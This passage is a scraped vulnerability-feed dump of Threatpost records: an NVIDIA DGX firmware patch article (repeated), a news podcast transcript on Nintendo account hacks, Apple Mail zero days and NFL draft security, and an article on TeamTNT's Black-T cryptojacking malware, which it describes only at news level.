"https://threatpost.com/netgear-wont-patch-45-router-models-vulnerable-to-serious-flaw/157977/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-29T23:39:12", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are tied to its own firmware that runs on its DGX AMI baseboard management controller (BMC), the brains behind a remote monitoring service servers.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. \u201cIf you have access to OOB, it is game is over for the target.\u201d \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nGiven the high-stake computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug **\n\nNVIDIA said a patch fixing one high-severity bug (CVE\u20112020\u201111487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded RSA 1024 key with weak ciphers that could lead to information disclosure. A fix for the same bug (CVE\u20112020\u201111487), impacting other DGX systems (DGX-1, DGX-2) is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (Pytorch, Keras and Tensorflow), data processing pipelines and applications such as medical imaging and face recognition powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted, other vendors are also likely impacted. \u201cInteresting thing here is the supply chain. NVIDIA uses a BMC board by Quanta Computers, which is based on AMI software. So to fix issues [NVIDIA] had to push several vendors to get a fix.\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett-Packard Enterprise Megarac\n * Mikrobits (Mikrotik)\n * Netapp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN Motherboard\n * Gigabyte IPMI Motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE\u20112020\u201111483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nVulnerable NVIDIA DGX server models impacted include DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high-severity (CVE\u20112020\u201111484, CVE\u20112020\u201111487, CVE\u20112020\u201111485, CVE\u20112020\u201111486) with the most serious of the four tracked as [CVE\u20112020\u201111484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "href": "https://threatpost.com/nvidia-patches-critical-bug-in-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:26:07", "description": "For the week ended April 24, Threatpost editors discuss the hottest cybersecurity news stories, including:\n\n * Apple [zero days disclosed](<https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/>) in the iPhone iOS that researchers say have been exploited for years. Meanwhile, [Apple has pushed back](<https://threatpost.com/apple-pushes-back-against-zero-day-exploit-claims/155108/>) and said there\u2019s no evidence to support such activity.\n * Nintendo [confirming that](<https://threatpost.com/nintendo-confirms-breach-of-160000-accounts/155110/>) over 160,000 accounts have been hacked, due to attackers abusing a legacy login system (NNID).\n * With the [NFL\u2019s virtual draft](<https://threatpost.com/nfl-tackles-cybersecurity-2020-draft-day/155004/>) kicking off this week, security researchers and teams have been sounding off on security issues leading to data theft or denial of service attacks.\n\n[Download direct here](<http://traffic.libsyn.com/digitalunderground/news_wrap_apr_24_3.mp3>), or listen to the podcast below.\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/14130716/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below find a lightly edited transcript of the Threatpost news wrap._\n\n**Lindsey O\u2019Donnell-Welch**: Hello everyone, welcome back to the [Threatpost news wrap](<https://threatpost.com/category/podcasts/>). You\u2019ve got the Threatpost team here today to discuss this week\u2019s top cyber security news, including myself, Lindsey O\u2019Donnell-Welch and Threatpost editors Tom Spring and Tara Seals. Tom and Tara, happy Friday.\n\n**Tom Spring**: Hey!\n\n**Tara Seals: **Hey, Lindsey. How are you?\n\n**Lindsey: **Good. There\u2019s been a lot of news from this week that we need to unpack. We\u2019ve had leaked source code, Apple zero days, security issues around the NFL draft. So, Tom, I mean, starting with the Apple zero days, that was kind of a huge news item of the week, and there was some back and forth, and I think the most recent thing, was Apple having a statement come out today about the zero days. Can you kind of give us a sense of what that was all about?\n\n**Tom:** Well, sure, sure. It\u2019s an evolving story. And it started a couple days ago when a number of researchers and I\u2019m probably gonna mispronounce the name of the security firm, ZecOps or something along those lines -I can never pronounce these names \u2013 But anyways, they found two zero days, or what they claimed are two zero days that are very, very troubling when described. An attacker can send an email to an iOS device. And if Apple\u2019s default mail program receives that message, there are two vulnerabilities \u2013 an out of bounds write vulnerability and a heap overflow bug \u2013 that kick in when this specially crafted message arrives. In very simple terms, the bugs impact the way that the mail program processes memory. And I won\u2019t get into the technical aspects of it, we\u2019ve written about it, it\u2019s on Threatpost. But essentially, the hackers can use this to either extract data from the mailbox itself, and or combine the flaw to actually take over the device or take control of the device. This was something that was very shocking considering that any modern patched version of the iOS was vulnerable to this attack. The researchers said that this is an attack that\u2019s been used in the wild in a number of targeted attacks by some APTs. And so that story goes. Apple did release a beta update to iOS. And it was reported a couple days ago. And it seemed to suggest Apple was kind of quiet at the time. But given that Apple had released a beta version of its iOS, it seemed that Apple was was not explicitly stating that there was a problem, but suggested it by sending out a patch. Now today, Apple is downplaying the impact of the bug and saying that it has found no evidence that that the bug, number one, has been used in the wild. And just to briefly, quote, Apple\u2019s statement released I believe was yesterday: \u201cWe have concluded these issues do not pose an immediate risk to our users. The researchers identified three issues in mail, but alone, they are insufficient to bypass iPhone or iPad protections. And we have found no evidence they were used against customers.\u201d So we have the classic he said, she said, and we\u2019ll see how this plays out. But it\u2019s high drama, once again with zero days, zero day claims and zero day denials.\n\n**Lindsey:** Yeah, it definitely seems like it is turning into kind of a he said-she said type of report. And it\u2019s interesting too, you know, just looking at ZecOp\u2019s report, they did kind of go into deep detail about the flaws being exploited in the wild. And I think they had mentioned that there were a number of different targets, including individuals from a Fortune 500 org in North America, and executives from a Japanese based carrier. So it is just kind of interesting that Apple is pushing about back against those specific claims that the bugs have been exploited for years. And I\u2019m curious to see kind of where this goes and whether the researchers respond back to Apple at all, and, you know, further kind of corroborate what they had written in the report.\n\n**Tom:** Yeah, well, you know, Apple has gotten some support from the research community. I believe that Google\u2019s Project Zero researchers have chimed in expressing some doubt on the ZecOps research. Meanwhile if anybody\u2019s worried there is the beta version of the iOS that you can download right now and I\u2019m sure we\u2019re going to be hearing more from Apple about them pushing out an update, a final update, for the iOS as well. But you know, I mean, I mean here again, you have Apple which is tight lipped won\u2019t comment and I mean, they have to put out a statement days after the the researchers come out with their their findings. From a reporter standpoint, it would be so nice [if Apple would open up a bigger dialogue](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>), not only with journalists, but especially with researchers in terms of maybe helping them better understand what they found, the original research really, casted no doubt on their own research. I mean, why would they, but at least, you know, they could have tempered some of their research with some feedback from Apple. I\u2019m not too sure if they purposely left it out. But you know, historically speaking, it\u2019s tough for researchers to get to vendors to give a [full throated response to their research](<https://threatpost.com/google-bug-hunter-urges-apple-to-change-its-ios-security-culture/134842/>), but we shall be following this story. I\u2019m sure we might even see some interesting things happen over the weekend and Monday morning. We\u2019ll be watching carefully.\n\n**Tara**: I have a question Tom. Have there been any third party researchers that have taken a look at this and weighed in at all with an opinion?\n\n**Tom:** Well, Google Project Zero did. And they cast some doubt on the research itself. I\u2019m not aware of anybody else, I\u2019ve heard a lot of researchers comment on the zero days, but they were commenting in reaction to the actual research being released, they weren\u2019t commenting on, their own reverse engineering, the proof of concepts and dissecting the research itself. So, you know, there could be a lot more noise going out there. And again, this is a fast moving story, and it\u2019s evolving quickly. And we will be keeping a close eye on the Twittersphere of reliable researchers and reaching out to a lot of people on the phone and hopefully, we\u2019ll have a good solid update either over the weekend or ASAP to better assess the real threat here with these \u201czero days.\u201d\n\n**Lindsey: **Right. Well, that was definitely one of the bigger stories of this week. And actually another big story, I guess two similar stories kind of revolved around the gaming community. And one of those stories was Nintendo today, coming out and confirming that 160,000 accounts have been hacked.\n\n**Tom:** Yeah Lindsey, which Nintendo\u2019s accounts? Do we know? I mean, I\u2019m just thinking about my my son\u2019s different accounts with Nintendo. Do we know what platform or services may have been impacted?\n\n**Lindsey:** Yeah, so, basically over the past few weeks, gamers who are using the Nintendo Switch were reporting suspicious activities on their accounts. And they were basically going on Twitter and there were different posts on Reddit saying that unauthorized actors had been logging into their accounts using their PayPal or their payment card methods that were connected to the accounts and buying digital currency for like, online in-game systems. So like [Fortnite V-Bucks](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>), etc, etc. This was reported over the past few weeks by various outlets, but Nintendo had stayed kind of silent about whether this was actually happening or what was behind this. And finally, in a statement today, it said that it first of all confirmed the attacks, it said that specifically 160,000 accounts were hacked, and it said the reason that this hack was occurring was because attackers were abusing the Nintendo Network ID legacy login system, which I don\u2019t know if you guys remember but that was from the Nintendo 3DS and Wii U console. That was what was primarily used to login and to buy digital currency for those accounts. So anyways, Nintendo was saying that this login ID was being linked to various Nintendo accounts for the switch. And somehow attackers were able to access the accounts tied to this legacy login system and were then able to access the linked Nintendo accounts for the Switch. And from there, they\u2019d have access to the different payment methods, and were able to make the in-game purchases. So Nintendo didn\u2019t provide any further details about how these accounts were specifically being accessed. But they did say that they were being obtained by some means other than their own service. So I know there had been theories about like credential stuffing or otherwise but that doesn\u2019t seem like it was the case here. So it\u2019s now disabled the NNID login service so that you can\u2019t use that anymore.\n\n**Tom:** Well, I\u2019ll hear from my son with if he\u2019s had trouble connecting, and I\u2019ll know what\u2019s going on.\n\n**Lindsey:** Yeah, yeah, I would check in and make sure.\n\n**Tom:** I wrote a [story about at Linksys, they had to reset their passwords](<https://threatpost.com/attacks-on-linksys-routers-trigger-mass-password-reset/154914/>). And I\u2019m a Linksys customer. And they assured me that every single Linksys customer had been notified. And then I was like, \u201cWell, hold on a minute. I\u2019m a Linksys customer, I haven\u2019t been notified.\u201d And they backtracked and said, \u201cwell, we\u2019re doing it in waves.\u201d So I take it with a grain of salt, when a lot of these companies say they\u2019ve implemented a fix \u2013 whether or not that fix is immediate or whether phases in over time. So I\u2019ll be interested to hear whether my son\u2019s actually having issues or not, or whether they\u2019ve reset passwords or whatnot.\n\n**Lindsey:** Yeah, well, it seems like a lot of companies can post the statement onto their Twitter accounts or on their website and think that\u2019s enough. But you\u2019d be surprised that the number of people who actually need the email notification to be notified of these hacks. So, but it did advise players to set up two factor authentication, of course, to add that extra layer of security to accounts. And it is also resetting the passwords for affected accounts. So hopefully, this problem will go away. I know it had been a widespread kind of issue for people who had been reporting about it online. So we\u2019ll see.\n\nThat was one of the news related to kind of gaming. The other one was the [discovery of leaked source code this week](<https://threatpost.com/valve-confirms-csgo-team-fortress-2-source-code-leak/155092/>) for two popular games that were published by Valve. Those were Counter Strike: Global Offensive and Team Fortress 2. And basically, that was a whole issue because the source code, if accessed, could lead to security issues or cheating, which probably isn\u2019t as serious, but you know, it\u2019s still a problem. And Valve, the developer and publisher of the two games, came out and basically said that the source code in question dates back to 2017, and was already part of an existing leak from 2018. But anyways, I think that goes to show that these security issues do continue to pop up in the gaming space. And there\u2019s such like a massive install base for gamers that this is just a [really lucrative area for cybercriminals](<https://threatpost.com/researcher-discloses-second-steam-zero-day-after-valve-bug-bounty-ban/147593/>) to be looking at.\n\n**Tara:** Yeah, I definitely think that\u2019s the point I was going to make is that, I think, Nintendo has 20 million active users or something like that. And these massive multiplayer games have millions of users to in some cases, and so, you know, I\u2019m surprised we don\u2019t care more about gamer hacking stuff to be honest.\n\n**Lindsey:** Yeah, definitely. I definitely agree, Tara. And so, and then Tara, you also had a very timely news story about the NFL Draft, which is virtual this year and kind of the security concerns that researchers and also teams were having with the event as it starts this week. What was kind of the top concerns there?\n\n**Tara: **Yeah, so the NFL Draft, obviously is a massive, massive event for the league every single year. This is for the sliver of the population that doesn\u2019t know about it, it\u2019s basically where you have pro teams that are looking at the people that are coming out of college and, you know, the Canadian league and some other places that you know, have not been signed to the pros yet, and they evaluate their stats and everything and then this is their opportunity to find new people to the roster. And so in the past this has been done in sort of public space and everybody kind of gets together and teams will congregate at their stadiums and war rooms and things like that. That\u2019s not possible. And so everybody is basically trying to do this with one to one links, you know, from their houses. So you have a head coach in his house or her house, and then you have, you know, the GM in their house and then obviously, all the players trying to tune in, the prospective players that is and so if you look at it, the communications footprint here, the distributed communications footprint is pretty massive. And so in order to bring everybody together to make this happen, there\u2019s a couple of different platforms to do that, one was Microsoft Teams, and then there\u2019s Zoom, you know, infamous Zoom, which clubs are using to communicate amongst themselves.\n\n**Lindsey:** The security issues here are really something that\u2019s good to be looking at right now, with something as big as this, and it\u2019s something that we\u2019ll also have to probably continue looking at for for the foreseeable future. But I also think kind of the technical logistics in the background are important too. And I saw on Twitter yesterday, there was like this [picture of Belichick looking at the draft from his house](<https://twitter.com/jeffphowe/status/1253504449244512257?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1253504449244512257&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost.php%3Fpost%3D155122%26action%3Dedit>) in Nantucket and a bunch of people were, laughing about the fact that, questioning how he was able to get Wi-Fi on on Nantucket, and whether it was able to hold up and all these things. So I think, it\u2019s just so new that there\u2019s a lot of like questions and technical concerns there too.\n\n**Tara:** Yeah, it\u2019s kind of interesting because there are 100+ video feeds when you take into account you know, all the general managers, all the prospects which there are 58 different prospects and the coaches themselves and then plus that\u2019s not even including, you know, the individual underlings that are involved in the process. But yeah, the Belichick thing was really funny. And then also the [head coach of the Arizona Cardinals was all over Twitter](<https://twitter.com/nfldraftscout/status/1253478908487503873?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1253478908487503873&ref_url=https%3A%2F%2Fnesn.com%2F2020%2F04%2Fnfl-twitter-went-bananas-after-seeing-cardinals-kliff-kingburys-pad%2F>), it went totally viral yesterday, he has this sort of Bond villain layer in the Phoenix mountains vibe. It was all like gleaming white and like he\u2019s wearing, you know, Italian loafers. And he just looks at like an Armani ad or something. I mean, there\u2019s a lot of cultural fun stuff that goes along with this. But there\u2019s also a lot of, you know, legitimate cyber security concerns. And so, with the draft picks, you know, you wouldn\u2019t think of that as being sort of critical information, but it really is. And you consider that if a team\u2019s job strategy is leaked to another team, then that\u2019s obviously competitive and that can destroy a team season in theory. You also have, if these things are able to be intercepted, then it can be very useful for people in the online gambling world, for example, there\u2019s a lot of fraud that can be carried out with that. And so there are a few different things that can be done if job information falls into the wrong hands. And so that\u2019s really what they were concerned about. I did reach out to the NFL to find out what their take was on cyber security, and they wouldn\u2019t reveal what exactly they\u2019ve done. But they did say that they they are aware of the potential dangers, and I mean, the draft is going to continue through tomorrow. So, you know, remains to be seen if they successfully warded off any attacks or not.\n\n**Lindsey:** Right, I was about to ask if there have been any incidents so far, but I\u2019m sure that remains to be seen at this point. But yeah, I think that you know, obviously the the data itself in terms of team strategy and personnel plans is a big issue. And also I feel like denial of service could be an issue here too. And you know, launching a denial of service attack or even kicking people off.\n\n**Tara:** Yeah, I\u2019m so glad that you said that actually. Because that is that is one thing that one of the security researchers that I talked to had mentioned was that the denial of service aspect of this, obviously. So anybody who plays Fantasy Football is familiar with this, but you get a very short window of time to make your job spec and it\u2019s kind of a snooze, you lose if you don\u2019t do it in that time period, then you get passed over and you don\u2019t get to go back and redo it. So, you know, conceivably, an attacker could DDoS someone you know, a club and prevent them from making their draft pick and there would be no way for them to go back and remediate that really. So again, these are things that can make a pretty radical difference when it comes to the team\u2019s future. And of course, this is assuming that we\u2019re going to have an NFL season this year.\n\n**Lindsey:** We\u2019ll see. Fingers crossed. I really like that story. It\u2019s a fun and applicable story. And you know, I put it on Facebook and someone posted, \u201cyou know [the NFL has] been hacked when the first person picked is Terry Bradshaw.\u201d All right. Well, on that note, it\u2019s been a very busy week in the infosec world, and there\u2019s much more that needs to be covered. So let\u2019s wrap up the podcast here, Tom and Tara, thanks for coming on today.\n\n**Tom:** Yeah, thank you.\n\n**Tara:** Thanks, Lindsey. You guys have a good weekend.\n\n**Lindsey:** You too. And to all our listeners. Thank you for joining us today. If you like what you\u2019ve heard here, be sure to share this episode on social media. And if you have any comments or thoughts regarding Apple zero days, or any of the new stories that we\u2019ve talked about today, please [reach out to us on Twitter at @Threatpost](<https://twitter.com/threatpost>) and let\u2019s keep the conversation going. If not catch us next week on the Threatpost podcast.\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-04-24T17:11:16", "type": "threatpost", "title": "News Wrap: Nintendo Account Hacks, Apple Zero Days, NFL Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-24T17:11:16", "id": "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "href": "https://threatpost.com/news-wrap-nintendo-account-hacks-apple-zero-days-nfl-security/155122/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:09:04", "description": "Researchers have discovered the latest cryptojacking malware gambit from TeamTNT, called Black-T. The variant builds on the group\u2019s typical approach, with a few new \u2014 and sophisticated \u2014 extras.\n\nTeamTNT is known for its targeting of Amazon Web Services (AWS) credentials, to break into the cloud and use it to mine for the [Monero](<https://threatpost.com/monero-cybercrime-mining-malware/141116/>) cryptocurrency. But according to researchers with Palo Alto Network\u2019s Unit 42, with [Black-T](<https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/>), the group has added in additional capabilities to its tactics, techniques and procedures (TTPs). These include the addition of sophisticated network scanners; the targeting of competitor XMR mining tools on the network; and the use of password scrapers.\n\nWhat TeamTNT plans to do with the saved passwords and additional capabilities is still unclear, but the development signals that the group doesn\u2019t plan to slow down anytime soon.\n\nIn August, [TeamTNT was identified by researchers](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) as the first cryptojacking group to specifically target AWS. With increasingly sophisticated TTPs, the cybercriminal gang appears to be gaining steady momentum. Just last month, TeamTNT was discovered to have been leveraging a common open-source cloud monitoring tool called [Weave Scope, to infiltrate the cloud](<https://threatpost.com/teamtnt-remote-takeover-cloud-instances/159075/>) and execute commands without breaching the server.\n\nBlack-T represents a notable jump forward in the operation\u2019s sophistication, researchers said.\n\nOnce deployed, the first order of business for Black-T is to disable any other malware competing for processing power, including Kinsing, Kswapd0, ntpd miner, redis-backup miner, auditd miner, Migration miner, the Crux worm and Crux worm miner. Ironically, the fact that TeamTNT identified these competitors in their malware gives security professionals a critical heads-up to be on the lookout for potential threats from these groups, Unit 42 said.\n\nThis kind of cyberjacking turf warfare isn\u2019t new, but it appears to be accelerating.\n\n\u201cThe battle for cloud resources will continue well into the future,\u201d Nathaniel Quist, senior threat researcher for Unit 42 said. \u201cIn the past, attacker groups like [Rocke](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) and [Pacha](<https://www.paloaltonetworks.com/resources/research/digital-executive-summary-unit-42-cloud-threat-report-spring-2020>) would battle for resources. TeamTNT is battling with Kinsing malware and Crux worm today. I believe that this battle for resources will increase and attacker groups will look for other opportunities to use cloud resources. We can see this now with TeamTNT collecting passwords and AWS credentials in an attempt to expand and maintain a cloud presence.\u201d\n\nAfter it eliminates the competition, Black-T installs masscan, libpcap to listen to various resources on the network, including pnscan, zgrab, Docker and jq (the latter is a flexible command-line JSON processor, according to Unit 42).\n\n\u201cTeamTNT is investing more resources into scanning operations, likely with the intent to identify and compromise more cloud systems,\u201d Quist added. \u201cZmap is a known open-source scanning solution and with the creation of zgrab, a GoLang tool written for zmap, it is attempting to capitalize on the added benefits of the Go programming language, such as speed and performance increases. It is likely that TeamTNT actors are attempting to refine their scanning capabilities to make them faster, more accurate and less resource-intensive.\u201d\n\nNext, Black-T fetches various downloads: Beta to create a new directory; the mimipy and mimipenquin password scraping tools; and the XMR mining software called bd.\n\n\u201cThe inclusion of memory password-scraping tools should be considered an evolution of tactics,\u201d Quist said. \u201cTeamTNT has already integrated the collection and exfiltration of AWS credentials from compromised cloud systems, which provides post-exploitation capabilities. By adding memory password-scraping capabilities, TeamTNT actors are increasing their chances in gaining persistence within cloud environments.\u201d\n\nThe use of [worms](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>) like masscan or pnscan by TeamTNT isn\u2019t new, but Unit 42 noticed Black-T adds a new scanning port. Researchers wonder whether this signals the group has figured out how to target Android devices as well.\n\nAs remote work and cost savings continue to drive computing to the cloud, more groups like TeamTNT are sure to emerge ready to take advantage, according to Quist. Admins should take steps to ensure that [Docker](<https://threatpost.com/doki-backdoor-docker-servers-cloud/157871/>) and daemon APIs, as well as any other sensitive network services, aren\u2019t exposed, so that the cloud can be protected from the next evolution of cloud cryptojackers, he added.\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar. **\n", "cvss3": {}, "published": "2020-10-05T19:47:05", "type": "threatpost", "title": "Black-T Malware Emerges From Cryptojacker Group TeamTNT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T19:47:05", "id": "THREATPOST:D4F89B42660582EFECA648A891470AD4", "href": "https://threatpost.com/blackt-cryptojacker-teamtnt/159853/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-29T23:46:43", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are tied to its own firmware that runs on its DGX AMI baseboard management controller (BMC), the brains behind a remote monitoring service servers.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. \u201cIf you have access to OOB, it is game is over for the target.\u201d \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nGiven the high-stake computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug **\n\nNVIDIA said a patch fixing one high-severity bug (CVE\u20112020\u201111487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded RSA 1024 key with weak ciphers that could lead to information disclosure. A fix for the same bug (CVE\u20112020\u201111487), impacting other DGX systems (DGX-1, DGX-2) is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (Pytorch, Keras and Tensorflow), data processing pipelines and applications such as medical imaging and face recognition powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted, other vendors are also likely impacted. \u201cInteresting thing here is the supply chain,\u201d he said. \u201cNVIDIA uses a BMC board by Quanta Computers, which is based on AMI software. So to fix issues [NVIDIA] had to push several vendors to get a fix.\u201d\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett-Packard Enterprise Megarac\n * Mikrobits (Mikrotik)\n * Netapp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN Motherboard\n * Gigabyte IPMI Motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE\u20112020\u201111483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nVulnerable NVIDIA DGX server models impacted include DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high-severity (CVE\u20112020\u201111484, CVE\u20112020\u201111487, CVE\u20112020\u201111485, CVE\u20112020\u201111486) with the most serious of the four tracked as [CVE\u20112020\u201111484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE 